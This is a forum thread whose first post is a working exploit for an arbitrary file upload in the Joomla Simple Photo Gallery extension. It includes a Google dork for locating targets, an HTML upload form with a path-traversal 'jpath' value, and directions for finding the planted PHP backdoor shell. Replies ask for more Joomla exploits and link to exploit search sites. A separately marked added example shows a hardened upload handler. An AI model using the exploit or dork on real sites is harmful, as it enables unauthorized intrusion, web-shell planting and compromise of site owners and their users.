Joomla Simple Photo Gallery - Arbitrary File Upload

03-10-2017, 03:53 AM #1
green2gold Offline Junior Member **
Registered
Posts:4 Threads:1 Joined:Mar 2017 Reputation: 0
Mood: None
######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extensio...to-gallery
# Version: 1
# Tested on: Windows
######################################################################
 
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
 
20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))
 
 
# Exploit :
 
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
 
# The name of the shell is shown after you click on Pwn!; the name is random (e.g. backdoor__FDSfezfs.php)
# Shell Path : http://localhost/backdoor__[RandomString].php
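
Added example (not part of the original post and not the extension's code): a hardened form of the upload logic in the quoted lines 20-96, where the destination is a fixed server-side directory rather than the request's `jpath`, and the stored name and extension are chosen by the server. The function name `store_gallery_upload`, the `UPLOAD_DIR` location and the allowed-type map are assumptions, and the caller is assumed to have authenticated the request already.

```php
<?php
// Added example, not the extension's code. UPLOAD_DIR and the allowed-type
// map are assumptions; point UPLOAD_DIR at a directory where PHP is not executed.
const UPLOAD_DIR = __DIR__ . '/gallery_uploads';

function store_gallery_upload(array $file, string $baseDir = UPLOAD_DIR): string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $tmp = $file['tmp_name'] ?? null;

    // Reject failed uploads, array-style fields and paths PHP did not create itself.
    if (($file['error'] ?? null) !== UPLOAD_ERR_OK || !is_string($tmp) || !is_uploaded_file($tmp)) {
        throw new RuntimeException('upload failed or not an HTTP upload');
    }
    // Decide the type from the content, never from the client-supplied name or MIME header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($mime) || !isset($allowed[$mime]) || getimagesize($tmp) === false) {
        throw new RuntimeException('not an allowed image type');
    }
    // The destination is fixed on the server; nothing like jpath is read from the request.
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('upload directory missing');
    }
    // Server-generated name with a server-chosen extension, so no .php can be requested.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $target = $base . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($tmp, $target)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($target, 0644);
    return $name;
}

// Request handler: same field name as the original script ('uploadfile').
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['uploadfile'])) {
    try {
        echo store_gallery_upload($_FILES['uploadfile']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
    }
}
```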

03-11-2017, 03:01 PM #2
Mr.Hawk Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
Do you have any other Joomla exploit?

03-11-2017, 05:17 PM #3
Hunter PCA Offline Junior Member **
Registered
Posts:25 Threads:6 Joined:Mar 2017 Reputation: 0
Mood: Thinking
(03-11-2017, 03:01 PM)Mr.Hawk Wrote:  Do you have any other Joomla exploit?

https://www.exploit-db.com/search/?actio...h&q=Joomla
https://0day.today/search?search_request=Joomla

Check these out

-- I know, I am something, because GOD never creates garbage --